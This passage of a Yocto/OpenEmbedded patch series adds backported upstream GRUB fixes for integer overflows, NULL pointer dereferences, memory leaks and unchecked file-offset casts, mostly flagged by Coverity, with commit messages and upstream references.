+++ b/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch
@@ -0,0 +1,104 @@
+From 69b91f7466a5ad5fb85039a5b4118efb77ad6347 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 4 Nov 2020 14:43:44 +0000
+Subject: [PATCH] video/fb/video_fb: Fix multiple integer overflows
+
+The calculation of the unsigned 64-bit value is being generated by
+multiplying 2, signed or unsigned, 32-bit integers which may overflow
+before promotion to unsigned 64-bit. Fix all of them.
+
+Fixes: CID 73703, CID 73767, CID 73833
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=08e098b1dbf01e96376f594b337491bc4cfa48dd]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/video_fb.c | 52 ++++++++++++++++++++++++-----------
+ 1 file changed, 36 insertions(+), 16 deletions(-)
+
+diff --git a/grub-core/video/fb/video_fb.c b/grub-core/video/fb/video_fb.c
+index 1a602c8..1c9a138 100644
+--- a/grub-core/video/fb/video_fb.c
++++ b/grub-core/video/fb/video_fb.c
+@@ -25,6 +25,7 @@
+ #include <grub/fbutil.h>
+ #include <grub/bitmap.h>
+ #include <grub/dl.h>
++#include <grub/safemath.h>
+ 
+ GRUB_MOD_LICENSE ("GPLv3+");
+ 
+@@ -1417,15 +1418,23 @@ doublebuf_blit_update_screen (void)
+ {
+   if (framebuffer.current_dirty.first_line
+       <= framebuffer.current_dirty.last_line)
+-    grub_memcpy ((char *) framebuffer.pages[0]
+-		 + framebuffer.current_dirty.first_line
+-		 * framebuffer.back_target->mode_info.pitch,
+-		 (char *) framebuffer.back_target->data
+-		 + framebuffer.current_dirty.first_line
+-		 * framebuffer.back_target->mode_info.pitch,
+-		 framebuffer.back_target->mode_info.pitch
+-		 * (framebuffer.current_dirty.last_line
+-		    - framebuffer.current_dirty.first_line));
++    {
++      grub_size_t copy_size;
++
++      if (grub_sub (framebuffer.current_dirty.last_line,
++		    framebuffer.current_dirty.first_line, &copy_size) ||
++	  grub_mul (framebuffer.back_target->mode_info.pitch, copy_size, &copy_size))
++	{
++	  /* Shouldn't happen, but if it does we've a bug. */
++	  return GRUB_ERR_BUG;
++	}
++
++      grub_memcpy ((char *) framebuffer.pages[0] + framebuffer.current_dirty.first_line *
++		   framebuffer.back_target->mode_info.pitch,
++		   (char *) framebuffer.back_target->data + framebuffer.current_dirty.first_line *
++		   framebuffer.back_target->mode_info.pitch,
++		   copy_size);
++    }
+   framebuffer.current_dirty.first_line
+     = framebuffer.back_target->mode_info.height;
+   framebuffer.current_dirty.last_line = 0;
+@@ -1439,7 +1448,7 @@ grub_video_fb_doublebuf_blit_init (struct grub_video_fbrender_target **back,
+ 				   volatile void *framebuf)
+ {
+   grub_err_t err;
+-  grub_size_t page_size = mode_info.pitch * mode_info.height;
++  grub_size_t page_size = (grub_size_t) mode_info.pitch * mode_info.height;
+ 
+   framebuffer.offscreen_buffer = grub_zalloc (page_size);
+   if (! framebuffer.offscreen_buffer)
+@@ -1482,12 +1491,23 @@ doublebuf_pageflipping_update_screen (void)
+     last_line = framebuffer.previous_dirty.last_line;
+ 
+   if (first_line <= last_line)
+-    grub_memcpy ((char *) framebuffer.pages[framebuffer.render_page]
+-		 + first_line * framebuffer.back_target->mode_info.pitch,
+-		 (char *) framebuffer.back_target->data
+-		 + first_line * framebuffer.back_target->mode_info.pitch,
+-		 framebuffer.back_target->mode_info.pitch
+-		 * (last_line - first_line));
++    {
++      grub_size_t copy_size;
++
++      if (grub_sub (last_line, first_line, &copy_size) ||
++	  grub_mul (framebuffer.back_target->mode_info.pitch, copy_size, &copy_size))
++	{
++	  /* Shouldn't happen, but if it does we've a bug. */
++	  return GRUB_ERR_BUG;
++	}
++
++      grub_memcpy ((char *) framebuffer.pages[framebuffer.render_page] + first_line *
++		   framebuffer.back_target->mode_info.pitch,
++		   (char *) framebuffer.back_target->data + first_line *
++		   framebuffer.back_target->mode_info.pitch,
++		   copy_size);
++    }
++
+   framebuffer.previous_dirty = framebuffer.current_dirty;
+   framebuffer.current_dirty.first_line
+     = framebuffer.back_target->mode_info.height;
diff --git a/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch b/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch
new file mode 100644
index 0000000000..c82b2c7df0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch
@@ -0,0 +1,39 @@
+From aac5574ff340a665ccc78d4c3d61596ac67acbbe Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 14:51:30 +0000
+Subject: [PATCH] video/fb/video_fb: Fix possible integer overflow
+
+It is minimal possibility that the values being used here will overflow.
+So, change the code to use the safemath function grub_mul() to ensure
+that doesn't happen.
+
+Fixes: CID 73761
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=08413f2f4edec0e2d9bf15f836f6ee5ca2e379cb]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/video_fb.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/video/fb/video_fb.c b/grub-core/video/fb/video_fb.c
+index 1c9a138..ae6b89f 100644
+--- a/grub-core/video/fb/video_fb.c
++++ b/grub-core/video/fb/video_fb.c
+@@ -1537,7 +1537,13 @@ doublebuf_pageflipping_init (struct grub_video_mode_info *mode_info,
+ 			     volatile void *page1_ptr)
+ {
+   grub_err_t err;
+-  grub_size_t page_size = mode_info->pitch * mode_info->height;
++  grub_size_t page_size = 0;
++
++  if (grub_mul (mode_info->pitch, mode_info->height, &page_size))
++    {
++      /* Shouldn't happen, but if it does we've a bug. */
++      return GRUB_ERR_BUG;
++    }
+ 
+   framebuffer.offscreen_buffer = grub_malloc (page_size);
+   if (! framebuffer.offscreen_buffer)
diff --git a/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch b/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch
new file mode 100644
index 0000000000..3fca2aecb5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch
@@ -0,0 +1,38 @@
+From 88361a7fd4e481a76e1159a63c9014fa997ef29c Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 15:39:00 +0000
+Subject: [PATCH] video/readers/jpeg: Test for an invalid next marker reference
+ from a jpeg file
+
+While it may never happen, and potentially could be caught at the end of
+the function, it is worth checking up front for a bad reference to the
+next marker just in case of a maliciously crafted file being provided.
+
+Fixes: CID 73694
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5f5eb7ca8e971227e95745abe541df3e1509360e]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/readers/jpeg.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/grub-core/video/readers/jpeg.c b/grub-core/video/readers/jpeg.c
+index 31359a4..0b6ce3c 100644
+--- a/grub-core/video/readers/jpeg.c
++++ b/grub-core/video/readers/jpeg.c
+@@ -253,6 +253,12 @@ grub_jpeg_decode_quan_table (struct grub_jpeg_data *data)
+   next_marker = data->file->offset;
+   next_marker += grub_jpeg_get_word (data);
+ 
++  if (next_marker > data->file->size)
++    {
++      /* Should never be set beyond the size of the file. */
++      return grub_error (GRUB_ERR_BAD_FILE_TYPE, "jpeg: invalid next reference");
++    }
++
+   while (data->file->offset + sizeof (data->quan_table[id]) + 1
+ 	 <= next_marker)
+     {
diff --git a/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch b/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch
new file mode 100644
index 0000000000..61e5e5797d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch
@@ -0,0 +1,34 @@
+From 9433cb3a37c03f22c2fa769121f1f509fd031ae9 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Mon, 7 Dec 2020 14:44:47 +0000
+Subject: [PATCH] gfxmenu/gui_list: Remove code that coverity is flagging as
+ dead
+
+The test of value for NULL before calling grub_strdup() is not required,
+since the if condition prior to this has already tested for value being
+NULL and cannot reach this code if it is.
+
+Fixes: CID 73659
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=4a1aa5917595650efbd46b581368c470ebee42ab]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/gfxmenu/gui_list.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/gfxmenu/gui_list.c b/grub-core/gfxmenu/gui_list.c
+index 01477cd..df334a6 100644
+--- a/grub-core/gfxmenu/gui_list.c
++++ b/grub-core/gfxmenu/gui_list.c
+@@ -771,7 +771,7 @@ list_set_property (void *vself, const char *name, const char *value)
+         {
+           self->need_to_recreate_boxes = 1;
+           grub_free (self->selected_item_box_pattern);
+-          self->selected_item_box_pattern = value ? grub_strdup (value) : 0;
++          self->selected_item_box_pattern = grub_strdup (value);
+           self->selected_item_box_pattern_inherit = 0;
+         }
+     }
diff --git a/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch b/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch
new file mode 100644
index 0000000000..34643e10ab
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch
@@ -0,0 +1,47 @@
+From 7899384c8fdf9ed96566978c49b0c6e40e70703d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 21:47:13 +0000
+Subject: [PATCH] loader/bsd: Check for NULL arg up-front
+
+The code in the next block suggests that it is possible for .set to be
+true but .arg may still be NULL.
+
+This code assumes that it is never NULL, yet later is testing if it is
+NULL - that is inconsistent.
+
+So we should check first if .arg is not NULL, and remove this check that
+is being flagged by Coverity since it is no longer required.
+
+Fixes: CID 292471
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5d5391b0a05abe76e04c1eb68dcc6cbef5326c4a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/i386/bsd.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/loader/i386/bsd.c b/grub-core/loader/i386/bsd.c
+index b92cbe9..8432283 100644
+--- a/grub-core/loader/i386/bsd.c
++++ b/grub-core/loader/i386/bsd.c
+@@ -1605,7 +1605,7 @@ grub_cmd_openbsd (grub_extcmd_context_t ctxt, int argc, char *argv[])
+   kernel_type = KERNEL_TYPE_OPENBSD;
+   bootflags = grub_bsd_parse_flags (ctxt->state, openbsd_flags);
+ 
+-  if (ctxt->state[OPENBSD_ROOT_ARG].set)
++  if (ctxt->state[OPENBSD_ROOT_ARG].set && ctxt->state[OPENBSD_ROOT_ARG].arg != NULL)
+     {
+       const char *arg = ctxt->state[OPENBSD_ROOT_ARG].arg;
+       unsigned type, unit, part;
+@@ -1622,7 +1622,7 @@ grub_cmd_openbsd (grub_extcmd_context_t ctxt, int argc, char *argv[])
+ 			   "unknown disk type name");
+ 
+       unit = grub_strtoul (arg, (char **) &arg, 10);
+-      if (! (arg && *arg >= 'a' && *arg <= 'z'))
++      if (! (*arg >= 'a' && *arg <= 'z'))
+ 	return grub_error (GRUB_ERR_BAD_ARGUMENT,
+ 			   "only device specifications of form "
+ 			   "<type><number><lowercase letter> are supported");
diff --git a/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch b/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch
new file mode 100644
index 0000000000..41f09a22fc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch
@@ -0,0 +1,38 @@
+From 0a4aa7c16f65cdfaa1013f0796afa929f8d6dc1a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 12:53:10 +0000
+Subject: [PATCH] loader/xnu: Fix memory leak
+
+The code here is finished with the memory stored in name, but it only
+frees it if there curvalue is valid, while it could actually free it
+regardless.
+
+The fix is a simple relocation of the grub_free() to before the test
+of curvalue.
+
+Fixes: CID 96646
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=bcb59ece3263d118510c4440c4da0950f224bb7f]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 07232d2..b3029a8 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -1388,9 +1388,9 @@ grub_xnu_fill_devicetree (void)
+     name[len] = 0;
+ 
+     curvalue = grub_xnu_create_value (curkey, name);
++    grub_free (name);
+     if (!curvalue)
+       return grub_errno;
+-    grub_free (name);
+    
+     data = grub_malloc (grub_strlen (var->value) + 1);
+     if (!data)
diff --git a/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch b/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch
new file mode 100644
index 0000000000..f9ad0fc34c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch
@@ -0,0 +1,77 @@
+From 81117a77a9e945ee5e7c1f12bd5667e2a16cbe32 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Mon, 30 Nov 2020 12:18:24 -0300
+Subject: [PATCH] loader/xnu: Free driverkey data when an error is detected in
+ grub_xnu_writetree_toheap()
+
+... to avoid memory leaks.
+
+Fixes: CID 96640
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=4b4027b6b1c877d7ab467896b04c7bd1aadcfa15]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 24 ++++++++++++++++++++----
+ 1 file changed, 20 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index b3029a8..39ceff8 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -224,26 +224,33 @@ grub_xnu_writetree_toheap (grub_addr_t *target, grub_size_t *size)
+   if (! memorymap)
+     return grub_errno;
+ 
+-  driverkey = (struct grub_xnu_devtree_key *) grub_malloc (sizeof (*driverkey));
++  driverkey = (struct grub_xnu_devtree_key *) grub_zalloc (sizeof (*driverkey));
+   if (! driverkey)
+     return grub_errno;
+   driverkey->name = grub_strdup ("DeviceTree");
+   if (! driverkey->name)
+-    return grub_errno;
++    {
++      err = grub_errno;
++      goto fail;
++    }
++
+   driverkey->datasize = sizeof (*extdesc);
+   driverkey->next = memorymap->first_child;
+   memorymap->first_child = driverkey;
+   driverkey->data = extdesc
+     = (struct grub_xnu_extdesc *) grub_malloc (sizeof (*extdesc));
+   if (! driverkey->data)
+-    return grub_errno;
++    {
++      err = grub_errno;
++      goto fail;
++    }
+ 
+   /* Allocate the space based on the size with dummy value. */
+   *size = grub_xnu_writetree_get_size (grub_xnu_devtree_root, "/");
+   err = grub_xnu_heap_malloc (ALIGN_UP (*size + 1, GRUB_XNU_PAGESIZE),
+ 			      &src, target);
+   if (err)
+-    return err;
++    goto fail;
+ 
+   /* Put real data in the dummy. */
+   extdesc->addr = *target;
+@@ -252,6 +259,15 @@ grub_xnu_writetree_toheap (grub_addr_t *target, grub_size_t *size)
+   /* Write the tree to heap. */
+   grub_xnu_writetree_toheap_real (src, grub_xnu_devtree_root, "/");
+   return GRUB_ERR_NONE;
++
++ fail:
++  memorymap->first_child = NULL;
++
++  grub_free (driverkey->data);
++  grub_free (driverkey->name);
++  grub_free (driverkey);
++
++  return err;
+ }
+ 
+ /* Find a key or value in parent key. */
diff --git a/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch b/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch
new file mode 100644
index 0000000000..8081f7763a
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch
@@ -0,0 +1,42 @@
+From 778a3fffd19229e5650a1abfb06c974949991cd4 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 30 Nov 2020 10:36:00 -0300
+Subject: [PATCH] loader/xnu: Check if pointer is NULL before using it
+
+Fixes: CID 73654
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7c8a2b5d1421a0f2a33d33531f7561f3da93b844]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 39ceff8..adc048c 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -667,6 +667,9 @@ grub_xnu_load_driver (char *infoplistname, grub_file_t binaryfile,
+   char *name, *nameend;
+   int namelen;
+ 
++  if (infoplistname == NULL)
++    return grub_error (GRUB_ERR_BAD_FILENAME, N_("missing p-list filename"));
++
+   name = get_name_ptr (infoplistname);
+   nameend = grub_strchr (name, '/');
+ 
+@@ -698,10 +701,7 @@ grub_xnu_load_driver (char *infoplistname, grub_file_t binaryfile,
+   else
+     macho = 0;
+ 
+-  if (infoplistname)
+-    infoplist = grub_file_open (infoplistname, GRUB_FILE_TYPE_XNU_INFO_PLIST);
+-  else
+-    infoplist = 0;
++  infoplist = grub_file_open (infoplistname, GRUB_FILE_TYPE_XNU_INFO_PLIST);
+   grub_errno = GRUB_ERR_NONE;
+   if (infoplist)
+     {
diff --git a/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch b/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch
new file mode 100644
index 0000000000..ea563a41a0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch
@@ -0,0 +1,41 @@
+From 5d2dd0052474a882a22e47cc8c3ed87a01819f6b Mon Sep 17 00:00:00 2001
+From: Daniel Kiper <daniel.kiper@oracle.com>
+Date: Thu, 25 Feb 2021 18:35:01 +0100
+Subject: [PATCH] util/grub-install: Fix NULL pointer dereferences
+
+Two grub_device_open() calls does not have associated NULL checks
+for returned values. Fix that and appease the Coverity.
+
+Fixes: CID 314583
+
+Signed-off-by: Daniel Kiper <daniel.kiper@oracle.com>
+Reviewed-by: Javier Martinez Canillas <javierm@redhat.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8b3a95655b4391122e7b0315d8cc6f876caf8183]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/grub-install.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/util/grub-install.c b/util/grub-install.c
+index a82725f..367350f 100644
+--- a/util/grub-install.c
++++ b/util/grub-install.c
+@@ -1775,6 +1775,8 @@ main (int argc, char *argv[])
+ 	  fill_core_services (core_services);
+ 
+ 	  ins_dev = grub_device_open (install_drive);
++	  if (ins_dev == NULL)
++	    grub_util_error ("%s", grub_errmsg);
+ 
+ 	  bless (ins_dev, core_services, 0);
+ 
+@@ -1875,6 +1877,8 @@ main (int argc, char *argv[])
+ 	  fill_core_services(core_services);
+ 
+ 	  ins_dev = grub_device_open (install_drive);
++	  if (ins_dev == NULL)
++	    grub_util_error ("%s", grub_errmsg);
+ 
+ 	  bless (ins_dev, boot_efi, 1);
+ 	  if (!removable && update_nvram)
diff --git a/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch b/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch
new file mode 100644
index 0000000000..0cd8ec3611
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch
@@ -0,0 +1,46 @@
+From 3d68daf2567aace4b52bd238cfd4a8111af3bc04 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 14:33:50 +0000
+Subject: [PATCH] util/grub-editenv: Fix incorrect casting of a signed value
+
+The return value of ftell() may be negative (-1) on error. While it is
+probably unlikely to occur, we should not blindly cast to an unsigned
+value without first testing that it is not negative.
+
+Fixes: CID 73856
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5dc41edc4eba259c6043ae7698c245ec1baaacc6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/grub-editenv.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/util/grub-editenv.c b/util/grub-editenv.c
+index f3662c9..db6f187 100644
+--- a/util/grub-editenv.c
++++ b/util/grub-editenv.c
+@@ -125,6 +125,7 @@ open_envblk_file (const char *name)
+ {
+   FILE *fp;
+   char *buf;
++  long loc;
+   size_t size;
+   grub_envblk_t envblk;
+ 
+@@ -143,7 +144,12 @@ open_envblk_file (const char *name)
+     grub_util_error (_("cannot seek `%s': %s"), name,
+ 		     strerror (errno));
+ 
+-  size = (size_t) ftell (fp);
++  loc = ftell (fp);
++  if (loc < 0)
++    grub_util_error (_("cannot get file location `%s': %s"), name,
++		     strerror (errno));
++
++  size = (size_t) loc;
+ 
+   if (fseek (fp, 0, SEEK_SET) < 0)
+     grub_util_error (_("cannot seek `%s': %s"), name,
diff --git a/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch b/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch
new file mode 100644
index 0000000000..66d7c0aa42
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch
@@ -0,0 +1,50 @@
+From e301a0f38a2130eb80f346c31e43bf5089af583c Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 15:04:28 +0000
+Subject: [PATCH] util/glue-efi: Fix incorrect use of a possibly negative value
+
+It is possible for the ftell() function to return a negative value,
+although it is fairly unlikely here, we should be checking for
+a negative value before we assign it to an unsigned value.
+
+Fixes: CID 73744
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=1641d74e16f9d1ca35ba1a87ee4a0bf3afa48e72]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/glue-efi.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/util/glue-efi.c b/util/glue-efi.c
+index 68f5316..de0fa6d 100644
+--- a/util/glue-efi.c
++++ b/util/glue-efi.c
+@@ -39,13 +39,23 @@ write_fat (FILE *in32, FILE *in64, FILE *out, const char *out_filename,
+   struct grub_macho_fat_header head;
+   struct grub_macho_fat_arch arch32, arch64;
+   grub_uint32_t size32, size64;
++  long size;
+   char *buf;
+ 
+   fseek (in32, 0, SEEK_END);
+-  size32 = ftell (in32);
++  size = ftell (in32);
++  if (size < 0)
++    grub_util_error ("cannot get end of input file '%s': %s",
++		     name32, strerror (errno));
++  size32 = (grub_uint32_t) size;
+   fseek (in32, 0, SEEK_SET);
++
+   fseek (in64, 0, SEEK_END);
+-  size64 = ftell (in64);
++  size = ftell (in64);
++  if (size < 0)
++    grub_util_error ("cannot get end of input file '%s': %s",
++		     name64, strerror (errno));
++  size64 = (grub_uint64_t) size;
+   fseek (in64, 0, SEEK_SET);
+ 
+   head.magic = grub_cpu_to_le32_compile_time (GRUB_MACHO_FAT_EFI_MAGIC);
diff --git a/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch b/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch
new file mode 100644
index 0000000000..b279222fff
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch
@@ -0,0 +1,28 @@
+From f5fb56954e5926ced42a980c3e0842ffd5fea2aa Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 3 Apr 2020 23:05:13 +1100
+Subject: [PATCH] script/execute: Fix NULL dereference in
+ grub_script_execute_cmdline()
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=41ae93b2e6c75453514629bcfe684300e3aec0ce]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/script/execute.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/script/execute.c b/grub-core/script/execute.c
+index 7e028e1..5ea2aef 100644
+--- a/grub-core/script/execute.c
++++ b/grub-core/script/execute.c
+@@ -940,7 +940,7 @@ grub_script_execute_cmdline (struct grub_script_cmd *cmd)
+   struct grub_script_argv argv = { 0, 0, 0 };
+ 
+   /* Lookup the command.  */
+-  if (grub_script_arglist_to_argv (cmdline->arglist, &argv) || ! argv.args[0])
++  if (grub_script_arglist_to_argv (cmdline->arglist, &argv) || ! argv.args || ! argv.args[0])
+     return grub_errno;
+ 
+   for (i = 0; i < argv.argc; i++)
diff --git a/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch b/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch
new file mode 100644
index 0000000000..5a327fe1d2
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch
@@ -0,0 +1,33 @@
+From dd82f98fa642907817f59aeaf3761b786898df85 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Mon, 11 Jan 2021 16:57:37 +1100
+Subject: [PATCH] commands/ls: Require device_name is not NULL before printing
+
+This can be triggered with:
+  ls -l (0 0*)
+and causes a NULL deref in grub_normal_print_device_info().
+
+I'm not sure if there's any implication with the IEEE 1275 platform.
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6afbe6063c95b827372f9ec310c9fc7461311eb1]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/ls.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/commands/ls.c b/grub-core/commands/ls.c
+index 5b7491a..326d2d6 100644
+--- a/grub-core/commands/ls.c
++++ b/grub-core/commands/ls.c
+@@ -196,7 +196,7 @@ grub_ls_list_files (char *dirname, int longlist, int all, int human)
+       goto fail;
+     }
+ 
+-  if (! *path)
++  if (! *path && device_name)
+     {
+       if (grub_errno == GRUB_ERR_UNKNOWN_FS)
+ 	grub_errno = GRUB_ERR_NONE;
